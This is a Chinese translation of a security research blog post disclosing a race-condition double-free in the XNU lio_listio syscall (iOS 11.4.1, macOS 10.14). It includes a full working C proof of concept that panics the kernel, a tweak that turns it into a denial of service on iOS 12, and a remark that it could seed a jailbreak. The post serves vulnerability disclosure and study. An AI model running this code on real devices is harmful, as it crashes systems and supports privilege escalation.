IOS/MacOS沙箱逃逸竞赛

2019 年 10 月 8 日
筆記

前言

lio_listio和PoC中公开的iOS 11.4.1内核漏洞引起了恐慌。

iOS 12在几周前发布了，并带来了许多安全方面的修复和改进。特别是，这个新版本碰巧修补了我们在Synacktiv发现的一个很厉害的内核漏洞。

目前尚不清楚这个漏洞是由Apple团队内部发现的，还是由英国国家网络安全中心(NCSC)提交的CVE-2018-4344。既然，似乎还没有人提交它，我们就在这篇博客文章中对它进行详细地分析一下！

此漏洞位于lio_listio系统调用中，在竞争条件将会被触发。它可以有效地被用于释放两次内核对象，从而导致潜在的UAF。

这个漏洞本身已经在大约9年前的xnu-1228和xnu-1456之间被提出，应该可以在大多数iOS多核设备上使用，直到iOS 11.4.1（包含在内）版本和MacOS的10.14版本的发布。在内部，我们将此漏洞命名为LightSpeed，因为我们在十分棘手的竞争条件下获胜了（并且作为添加一些关于星球大战模因的借口），但不要担心，我们不会将其作为一种标记。

因为 listio_lio系统调用可以从任何沙箱访问，并且由于漏洞提供了一些有趣的基本数据类型，LightSpeed可能会用于越狱iOS 11.4.1。但是，这篇博文将仅仅解释漏洞并提供触发内核崩溃的代码。

AIO系统调用介绍

正如在POSIX.1b中所定义的，XNU内核为用户空间提供不同的系统调用以执行异步的I/O(aio)。该标准规定各种功能,从而实现诸如 aio_read()， aio_write()， lio_listio()， aio_error()， aio_return(),…由于至少XNU-517以及大多数结构的开头是在/bsd/sys/aio.h中，这些系统调用在 bsd/kern/kern_aio.c可以被实现。

作为对AIO函数家族的介绍， aio_read()和 aio_write()分别是 read()的 write()系统调用的异步版本。这两个函数都期望 structaiocb*描述要执行的 I/O请求：

struct aiocb {      int         aio_fildes;     /* File descriptor */      off_t       aio_offset;     /* File offset */      volatile void *aio_buf;     /* Location of buffer */      size_t      aio_nbytes;     /* Length of transfer */      int        aio_reqprio;     /* Request priority offset */      struct sigevent aio_sigevent;       /* Signal number and value */      int     aio_lio_opcode;     /* Operation to be performed */  };

为了执行 I/O请求，XNU首先通过该函数 aio_create_queue_entry()，将用户结构转换为 aio_workq_entry。然后内核通过 aio_enqueue_work()将创建的对象排入系统的aio队列中。以下是两种功能的原型：

static  aio_workq_entry  *  aio_create_queue_entry （proc_t  procp， user_addr_t  aiocbp，                             void  * group_tag， int  kindOfIO）;    static  void  aio_enqueue_work （ proc_t  procp， aio_workq_entry  * entryp， int  proc_locked）;

加入队列之后，预定的工作准备好由 aio workers提取和处理， aio worker是执行函数 aio_work_thread()的内核线程。 aio_read()和 aio_write()系统调用可以立即返回，并且稍后通过 aio_return(), aio_error()可以请求aio的状态。

lio_listio

介绍完了之后，我们来谈谈 lio_listio()。这个系统调用类似于 aio_read()和 aio_write()，它被设计用于在一个调用中调度AIO的整个列表。所以它需要aiocb的一个数组以及其他一些参数。

int lio_listio(int mode, struct aiocb *restrict const list[restrict],                           int nent, struct sigevent *restrict sig);

该mode参数指定了系统调用的行为，并且必须以下其中的一个：

LIO_NOWAIT：aio被调度，然后系统调用立即返回;
LIO_WAIT：aio被调度，然后syscall等待所有工作的完成（异步地）。

在LIO_WAIT情况下，内核必须跟踪整批aio。实际上，当最后一个I/O被处理时，aio worker线程想要唤醒仍然在系统调用中等待用户的线程。

所以内核分配了一个 structaio_lio_context来处理它的 I/O(这在两种模式下完成)：

struct  aio_lio_context  {      int      io_waiter;      int      io_issued;      int      io_completed;  };  typedef  struct  aio_lio_context  aio_lio_context;

以下是lio_listio执行的相关部分（大部分已被删除）：

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )  {      /* lio_context allocation */      MALLOC(lio_context, aio_lio_context*, sizeof(aio_lio_context), M_TEMP, M_WAITOK);        /* userland extraction */      aiocbpp = aio_copy_in_list(p, uap->aiocblist, uap->nent);        lio_context->io_issued = uap->nent;        for ( i = 0; i < uap->nent; i++ ) {          user_addr_t my_aiocbp;          aio_workq_entry *entryp;            *(entryp_listp + i) = NULL;          my_aiocbp = *(aiocbpp + i);            /* creation of the aio_workq_entry */          /* lio_create_entry is a wrapper for aio_create_queue_entry */          result = lio_create_entry(p, my_aiocbp, lio_context, (entryp_listp+i));          if ( result != 0 && call_result == -1 )              call_result = result;            entryp = *(entryp_listp + i);            aio_proc_lock_spin(p);          // [...]          /* enqueing of the aio_workq_*/          lck_mtx_convert_spin(aio_proc_mutex(p));          aio_enqueue_work(p, entryp, 1);          aio_proc_unlock(p);      }        // [...]  }

在这里，我们可以看到， lio_context在每个 aio_workq_entry中都被标记上了（作为 aio_create_queue_entry()中的group_tag参数）。稍后，aio worker线程将检索此context，更新 lio_context->io_completed并在需要时唤醒用户线程。

漏洞：LightSpeed！

我们在上一节中解释了aioliocontext的用法，但仍然存在一个问题：谁负责释放context？这取决于mode操作。

当liolistio在LIONOWAIT模式时被调用，系统调用中的线程不会等待所有I/O被执行完成。所以释放liocontext是aio worker的工作。这是在最后一个aio被处理后，在doaio_completion例程中完成的：

static void do_aio_completion( aio_workq_entry *entryp )  {      // [...]      lio_context = (aio_lio_context *)entryp->group_tag;        if (lio_context != NULL) {            aio_proc_lock_spin(entryp->procp);          lio_context->io_completed++;            if (lio_context->io_issued == lio_context->io_completed) {              lastLioCompleted = TRUE;          }            waiter = lio_context->io_waiter;            /* explicit wakeup of lio_listio() waiting in LIO_WAIT */          if ((entryp->flags & AIO_LIO_NOTIFY) && (lastLioCompleted) && (waiter != 0)) {              /* wake up the waiter */              wakeup(lio_context);          }            aio_proc_unlock(entryp->procp);      }        // [...]      if (lastLioCompleted && (waiter == 0))          free_lio_context (lio_context);      } /* do_aio_completion */

另一方面，当调用者在LIOWAIT模式下等待时，liocontext将在lio_listio被释放。以下是系统调用结束时的相关部分：

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )  {      // [...]        switch(uap->mode) {      case LIO_WAIT:          aio_proc_lock_spin(p);          while (lio_context->io_completed < lio_context->io_issued) {              result = msleep(lio_context, aio_proc_mutex(p), /*...*/);                // [...]          }            /* If all IOs have finished must free it */          if (lio_context->io_completed == lio_context->io_issued) {              free_context = TRUE;          }            aio_proc_unlock(p);          break;        case LIO_NOWAIT:          break;      }        // [...]    ExitRoutine:      if ( entryp_listp != NULL )          FREE( entryp_listp, M_TEMP );      if ( aiocbpp != NULL )          FREE( aiocbpp, M_TEMP );      if ((lio_context != NULL) &&          ((lio_context->io_issued == 0) || (free_context == TRUE))) {          free_lio_context(lio_context);      }        // [...]        return( call_result );    } /* lio_listio */

前面的代码有一个小小的漏洞，可以在LIONOWAIT模式下被触发。最后一部分的test (liocontext->ioissued == 0)是在没有I/O被调度时，一个释放context的错误处理案例。例如，当用户向I/O发出请求，但它们都有LIONOP作为aiolioopcode（而不是LIOREAD或LIOWRITE）时，这就有可能发生。

但是，在执行时，先前的检查是错误的，并且由于其他内核线程可能已经篡改了，因此lio_context无法得到保证。

重点来了！

如果我们有超快的aio worker，甚至可以在系统调用结束之前执行我们所有的I/O，liocontext可能已经被释放并且已经被再次使用了。实际上，一旦aio被安排上，worker只需要调用者的pmlock程序开始工作，并且lio_listio会在多个时间释放它。

因此，如果liocontext被释放并且再次使用，那么liocontext->ioissued可能为零。在这种情况下，liolistio再次以调用freeliocontext()结束，并且最终释放另一个内核分配。

数据库crash

总而言之，我们需要按照以下顺序才能触发漏洞：

1.调用liolistio()来分配aioliocontext以及调度一些aio，然后在系统调用结束之前进行context切换; 2.aio worker线程执行所有调度的I/O，并释放aioliocontext; 3.kalloc.16池中的分配（aioliocontext的大小）再次使用与aioliocontext相同的分配; 4.在分配的第二个双字值中写入零(来进行liocontext->ioissued == 0); 5.context切换以继续推迟liolistio调用并引起分配释放。

步骤3和4是强制性的。实际上，由于alloc (kalloc16)的大小，空闲chunk最终总是会中毒(in zfree())，所以如果不重用分配，则在步骤5中liocontext->ioissued不能为零。在步骤5之后，如果未保持分配，并且内核尝试释放它，则系统将发生混乱。

以下代码展示了这种混乱(github link)（https://github.com/synacktiv/lightspeed）：

#include <stdio.h>  #include <string.h>  #include <stdlib.h>  #include <fcntl.h>  #include <unistd.h>  #include <aio.h>  #include <sys/errno.h>  #include <pthread.h>  #include <poll.h>    /* might have to play with those a bit */  #if MACOS_BUILD  #define NB_LIO_LISTIO 1  #define NB_RACER 5  #else  #define NB_LIO_LISTIO 1  #define NB_RACER 30  #endif    #define NENT 1    void *anakin(void *a)  {      printf("Now THIS is podracing!n");        uint64_t err;        int mode = LIO_NOWAIT;      int nent = NENT;      char buf[NENT];      void *sigp = NULL;        struct aiocb** aio_list = NULL;      struct aiocb*  aios = NULL;        char path[1024] = {0};  #if MACOS_BUILD      snprintf(path, sizeof(path), "/tmp/lightspeed");  #else      snprintf(path, sizeof(path), "%slightspeed", getenv("TMPDIR"));  #endif        int fd = open(path, O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);      if (fd < 0)      {          perror("open");          goto exit;      }        /* prepare real aio */      aio_list = malloc(nent * sizeof(*aio_list));      if (aio_list == NULL)      {          perror("malloc");          goto exit;      }        aios = malloc(nent * sizeof(*aios));      if (aios == NULL)      {          perror("malloc");          goto exit;      }        memset(aios, 0, nent * sizeof(*aios));      for(uint32_t i = 0; i < nent; i++)      {          struct aiocb* aio = &aios[i];            aio->aio_fildes = fd;          aio->aio_offset = 0;          aio->aio_buf = &buf[i];          aio->aio_nbytes = 1;          aio->aio_lio_opcode = LIO_READ; // change that to LIO_NOP for a DoS :D          aio->aio_sigevent.sigev_notify = SIGEV_NONE;            aio_list[i] = aio;      }        while(1)      {          err = lio_listio(mode, aio_list, nent, sigp);            for(uint32_t i = 0; i < nent; i++)          {              /* check the return err of the aio to fully consume it */              while(aio_error(aio_list[i]) == EINPROGRESS) {                  usleep(100);              }              err = aio_return(aio_list[i]);          }      }    exit:      if(fd >= 0)          close(fd);        if(aio_list != NULL)          free(aio_list);        if(aios != NULL)          free(aios);        return NULL;  }    void *sebulba()  {      printf("You're Bantha poodoo!n");      while(1)      {          /* not mandatory but used to make the race more likely */          /* this poll() will force a kalloc16 of a struct poll_continue_args */          /* with its second dword as 0 (to collide with lio_context->io_issued == 0) */          /* this technique is quite slow (1ms waiting time) and better ways to do so exists */          int n = poll(NULL, 0, 1);          if(n != 0)          {              /* when the race plays perfectly we might detect it before the crash */              /* most of the time though, we will just panic without going here */              printf("poll: %x - kernel crash incomming!n",n);          }      }        return 0;  }    void crash_kernel()  {      pthread_t *lio_listio_threads = malloc(NB_LIO_LISTIO * sizeof(*lio_listio_threads));      if (lio_listio_threads == NULL)      {          perror("malloc");          goto exit;      }        pthread_t *racers_threads = malloc(NB_RACER  * sizeof(*racers_threads));      if (racers_threads == NULL)      {          perror("malloc");          goto exit;      }        memset(racers_threads, 0, NB_RACER * sizeof(*racers_threads));      memset(lio_listio_threads, 0, NB_LIO_LISTIO * sizeof(*lio_listio_threads));        for(uint32_t i = 0; i < NB_RACER; i++)      {          pthread_create(&racers_threads[i], NULL, sebulba, NULL);      }      for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)      {          pthread_create(&lio_listio_threads[i], NULL, anakin, NULL);      }        for(uint32_t i = 0; i < NB_RACER; i++)      {          pthread_join(racers_threads[i], NULL);      }      for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)      {          pthread_join(lio_listio_threads[i], NULL);      }    exit:      return;  }    #if MACOS_BUILD  int main(int argc, char* argv[])  {      crash_kernel();        return 0;  }  #endif

修复和结论

虽然最新的XNU源（4570.71.2）仍然存在该漏洞，但该漏洞在iOS 12版本中得到了修复（至少从beta 4开始）。

以下是系统调用结束时Hex-Rays Decompiler的输出：

此代码可能是以下编译的结果：

if  （（free_context  ==  TRUE） &&  （lio_context  ！=  NULL）） {      free_lio_context（lio_context）;  }

一方面，该补丁修复了liocontext上的潜在的UAF。但另一方面，修复之前处理过的错误情况现在被忽略了…因此，可以使liolistio()分配一个永远不会被内核释放的aioliocontext。这给了我们一个错误的DoS，它会使最近的内核停止相应（包括iOS 12）。

要测试它，只需将PoC上的LIOREAD更改为LIONOP，并将NB_RACER设置为0。

最后，我们很高兴在此博客文章中公开了此漏洞，我们希望您喜欢。此漏洞在iOS 11.4.1上仍然可触发，因此可以尝试从中构建越狱（虽然用其他已披露的漏洞可能会更容易）。

对于其他的，在未来我们将看到Apple是否会用patch :D修复他们引入的小型DoS。

非常感谢我的同事们帮助完成这篇博文章。

原文链接：https://www.synacktiv.com/posts/exploit/lightspeed-a-race-for-an-iosmacos-sandbox-escape.html?tdsourcetag=spcqqaiomsg